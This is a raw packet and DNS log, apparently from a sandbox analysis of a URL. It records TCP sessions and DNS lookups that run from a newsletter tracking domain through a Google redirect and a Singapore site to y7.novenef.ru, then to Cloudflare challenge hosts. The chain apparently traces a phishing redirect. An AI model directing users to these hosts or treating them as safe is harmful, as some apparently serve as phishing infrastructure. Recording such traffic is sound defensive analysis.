                                                                      Jan 7, 2025 09:27:15.406142950 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.407800913 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.407864094 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.407895088 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.407918930 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.407927990 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.407955885 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.407965899 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.407970905 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.408004045 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.408027887 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.408032894 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.408071041 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.408075094 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.408123016 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.408229113 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.408281088 CET49742443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:15.408296108 CET44349742104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.411139965 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.411178112 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.411245108 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.411441088 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.411453009 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.518174887 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:15.873682976 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.875390053 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.875406981 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.875745058 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.876048088 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.876108885 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.876172066 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.919337988 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.998505116 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.998569965 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:15.998655081 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.999382019 CET49743443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:15.999401093 CET44349743104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:16.124164104 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:16.379184008 CET49673443192.168.2.16204.79.197.203
                                                                      Jan 7, 2025 09:27:16.533301115 CET44349712216.58.206.68192.168.2.16
                                                                      Jan 7, 2025 09:27:16.533389091 CET44349712216.58.206.68192.168.2.16
                                                                      Jan 7, 2025 09:27:16.533449888 CET49712443192.168.2.16216.58.206.68
                                                                      Jan 7, 2025 09:27:17.332196951 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:17.451404095 CET49712443192.168.2.16216.58.206.68
                                                                      Jan 7, 2025 09:27:17.451443911 CET44349712216.58.206.68192.168.2.16
                                                                      Jan 7, 2025 09:27:17.585982084 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:17.586038113 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:17.586102009 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:17.586393118 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:17.586405039 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.069215059 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.069529057 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.069560051 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.069891930 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.070240021 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.070303917 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.070375919 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.070478916 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.070514917 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.070636034 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.070672989 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325176954 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325253010 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325292110 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325325966 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325346947 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.325376034 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325387001 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.325433016 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.325506926 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.325778008 CET49744443192.168.2.16104.18.95.41
                                                                      Jan 7, 2025 09:27:18.325790882 CET44349744104.18.95.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.328275919 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.328322887 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.328399897 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.328598976 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.328609943 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.490230083 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.490283966 CET44349746104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.490392923 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.490653992 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.490669966 CET44349746104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.780620098 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.780924082 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.780951977 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.781272888 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.781563997 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.781625986 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.781687975 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.827326059 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.904846907 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.904911041 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.904983044 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.905662060 CET49745443192.168.2.16104.18.94.41
                                                                      Jan 7, 2025 09:27:18.905689001 CET44349745104.18.94.41192.168.2.16
                                                                      Jan 7, 2025 09:27:18.943526983 CET44349746104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.943834066 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.943867922 CET44349746104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.944864035 CET44349746104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.944947958 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945226908 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945249081 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945293903 CET44349746104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.945302010 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945355892 CET49746443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945575953 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945621967 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:18.945700884 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945874929 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:18.945888042 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.406826019 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.407140970 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.407174110 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.408194065 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.408281088 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.409351110 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.409419060 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.409521103 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.409529924 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.460172892 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.683536053 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:19.745170116 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:19.955799103 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.955909014 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.955980062 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.957058907 CET49747443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:19.957082987 CET44349747104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:19.984208107 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:20.078318119 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.078362942 CET44349750104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.078438044 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.078725100 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.078735113 CET44349750104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.559909105 CET44349750104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.560152054 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.560163975 CET44349750104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.561291933 CET44349750104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.561362982 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.561698914 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.561698914 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.561752081 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.561764956 CET44349750104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.561824083 CET49750443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.562006950 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.562041044 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.562118053 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.562321901 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:20.562338114 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:20.588171959 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:21.026308060 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.026509047 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.026530027 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.027546883 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.027607918 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.027870893 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.027934074 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.027990103 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.028000116 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.075171947 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.577044010 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.577136993 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.577251911 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.577891111 CET49751443192.168.2.16104.21.42.208
                                                                      Jan 7, 2025 09:27:21.577920914 CET44349751104.21.42.208192.168.2.16
                                                                      Jan 7, 2025 09:27:21.791181087 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:24.199181080 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:24.551198006 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:25.981187105 CET49673443192.168.2.16204.79.197.203
                                                                      Jan 7, 2025 09:27:29.013185978 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:34.162542105 CET49678443192.168.2.1620.189.173.10
                                                                      Jan 7, 2025 09:27:38.616261959 CET4968080192.168.2.16192.229.211.108
                                                                      Jan 7, 2025 09:27:48.076282024 CET49707443192.168.2.1652.48.213.169
                                                                      Jan 7, 2025 09:27:48.076308966 CET4434970752.48.213.169192.168.2.16
                                                                      Jan 7, 2025 09:27:48.539364100 CET4969780192.168.2.16199.232.210.172
                                                                      Jan 7, 2025 09:27:48.539448977 CET4969880192.168.2.16199.232.210.172
                                                                      Jan 7, 2025 09:27:48.544408083 CET8049697199.232.210.172192.168.2.16
                                                                      Jan 7, 2025 09:27:48.544471979 CET4969780192.168.2.16199.232.210.172
                                                                      Jan 7, 2025 09:27:48.544666052 CET8049698199.232.210.172192.168.2.16
                                                                      Jan 7, 2025 09:27:48.544715881 CET4969880192.168.2.16199.232.210.172
                                                                      Jan 7, 2025 09:28:02.655929089 CET4434970752.48.213.169192.168.2.16
                                                                      Jan 7, 2025 09:28:02.656012058 CET4434970752.48.213.169192.168.2.16
                                                                      Jan 7, 2025 09:28:02.656066895 CET49707443192.168.2.1652.48.213.169
                                                                      Jan 7, 2025 09:28:03.413428068 CET49707443192.168.2.1652.48.213.169
                                                                      Jan 7, 2025 09:28:03.413446903 CET4434970752.48.213.169192.168.2.16
                                                                      Jan 7, 2025 09:28:06.039407969 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:06.039449930 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:06.039525032 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:06.039719105 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:06.039732933 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:06.686115026 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:06.686377048 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:06.686402082 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:06.686727047 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:06.687017918 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:06.687079906 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:06.730411053 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:16.587397099 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:16.587467909 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:16.587534904 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:17.419002056 CET49793443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:28:17.419043064 CET44349793142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:28:39.433630943 CET4970080192.168.2.16192.229.221.95
                                                                      Jan 7, 2025 09:28:39.438796043 CET8049700192.229.221.95192.168.2.16
                                                                      Jan 7, 2025 09:28:39.438878059 CET4970080192.168.2.16192.229.221.95
                                                                      Jan 7, 2025 09:29:06.087362051 CET49800443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:29:06.087393045 CET44349800142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:29:06.087506056 CET49800443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:29:06.087735891 CET49800443192.168.2.16142.250.185.68
                                                                      Jan 7, 2025 09:29:06.087747097 CET44349800142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:29:06.719700098 CET44349800142.250.185.68192.168.2.16
                                                                      Jan 7, 2025 09:29:06.773468018 CET49800443192.168.2.16142.250.185.68
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 7, 2025 09:27:01.294972897 CET53639611.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:01.295264959 CET53640401.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:02.079358101 CET4982953192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:02.079646111 CET6473653192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:02.107152939 CET53498291.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:02.126827955 CET53647361.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:02.283277035 CET53629401.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:03.307410002 CET5420653192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:03.307540894 CET5255153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:03.315030098 CET53542061.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:03.316821098 CET53525511.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:05.176475048 CET6166553192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:05.177341938 CET6057153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:05.502902985 CET53616651.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:05.505872011 CET53605711.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:05.972453117 CET6505953192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:05.972728968 CET5878053192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:05.982353926 CET53650591.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:05.985755920 CET53587801.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:06.625061989 CET6552453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:06.625196934 CET5062053192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:06.722975016 CET53506201.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:06.824775934 CET53655241.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:08.591073990 CET5035753192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:08.591212988 CET5550453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:08.591478109 CET6436353192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:08.591592073 CET5103953192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:08.591820002 CET6226353192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:08.591943979 CET5061453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:08.597918987 CET53555041.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:08.598058939 CET53643631.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:08.598105907 CET53503571.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:08.598393917 CET53506141.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:08.598591089 CET53622631.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:08.599093914 CET53510391.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:09.322642088 CET5323153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:09.322774887 CET6423253192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:09.329313040 CET53642321.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:09.329327106 CET53532311.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:09.343828917 CET5034253192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:09.344094038 CET5023753192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:09.350527048 CET53503421.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:09.350636959 CET53502371.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:09.973651886 CET6504753192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:09.975305080 CET5791853192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:09.980245113 CET53650471.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:09.982155085 CET53579181.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:10.003529072 CET6095153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:10.003688097 CET6009553192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:10.011806965 CET53600951.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:10.011873007 CET53609511.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:11.632453918 CET5914453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:11.632453918 CET5112853192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:11.639372110 CET53591441.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:11.639384031 CET53511281.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:18.330779076 CET6201553192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:18.330902100 CET4995153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:18.481847048 CET53620151.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:18.489624977 CET53499511.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:19.248187065 CET53548461.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:19.964768887 CET5321453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:19.964951038 CET5550953192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:19.968722105 CET6151253192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:19.968883038 CET5782853192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:20.077368021 CET53615121.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:20.077543974 CET53578281.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:21.006028891 CET6409153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:21.006197929 CET6415453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:21.013312101 CET53641541.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:23.052606106 CET5597653192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:23.052766085 CET6230753192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:23.060091019 CET53623071.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:24.217621088 CET5310153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:24.218182087 CET6498153192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:27:24.224870920 CET53531011.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:24.226521015 CET53649811.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:29.006544113 CET53625241.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:27:38.016817093 CET53524961.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:28:00.801460028 CET53528561.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:28:01.121503115 CET53513251.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:28:06.031141043 CET5802253192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:28:06.031282902 CET6096953192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:28:06.038521051 CET53580221.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:28:06.038773060 CET53609691.1.1.1192.168.2.16
                                                                      Jan 7, 2025 09:28:11.401237965 CET138138192.168.2.16192.168.2.255
                                                                      Jan 7, 2025 09:28:11.643244028 CET5473753192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:28:11.643418074 CET6129453192.168.2.161.1.1.1
                                                                      Jan 7, 2025 09:28:30.704444885 CET53587341.1.1.1192.168.2.16
                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                      Jan 7, 2025 09:27:02.126900911 CET192.168.2.161.1.1.1c29f(Port unreachable)Destination Unreachable
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 7, 2025 09:27:02.079358101 CET192.168.2.161.1.1.10x882fStandard query (0)t1.a.editions-legislatives.frA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:02.079646111 CET192.168.2.161.1.1.10x9e0fStandard query (0)t1.a.editions-legislatives.fr65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:03.307410002 CET192.168.2.161.1.1.10x1155Standard query (0)www.google.co.nzA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:03.307540894 CET192.168.2.161.1.1.10xef0fStandard query (0)www.google.co.nz65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.176475048 CET192.168.2.161.1.1.10x3eb9Standard query (0)yesmotoring.com.sgA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.177341938 CET192.168.2.161.1.1.10x9619Standard query (0)yesmotoring.com.sg65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.972453117 CET192.168.2.161.1.1.10x8eeeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.972728968 CET192.168.2.161.1.1.10x34b9Standard query (0)www.google.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.625061989 CET192.168.2.161.1.1.10xfcaeStandard query (0)y7.novenef.ruA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.625196934 CET192.168.2.161.1.1.10x804aStandard query (0)y7.novenef.ru65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.591073990 CET192.168.2.161.1.1.10x608bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.591212988 CET192.168.2.161.1.1.10x5bc3Standard query (0)code.jquery.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.591478109 CET192.168.2.161.1.1.10xc915Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.591592073 CET192.168.2.161.1.1.10x8f0bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.591820002 CET192.168.2.161.1.1.10xe304Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.591943979 CET192.168.2.161.1.1.10xe421Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.322642088 CET192.168.2.161.1.1.10xbfcStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.322774887 CET192.168.2.161.1.1.10xbca1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.343828917 CET192.168.2.161.1.1.10xb035Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
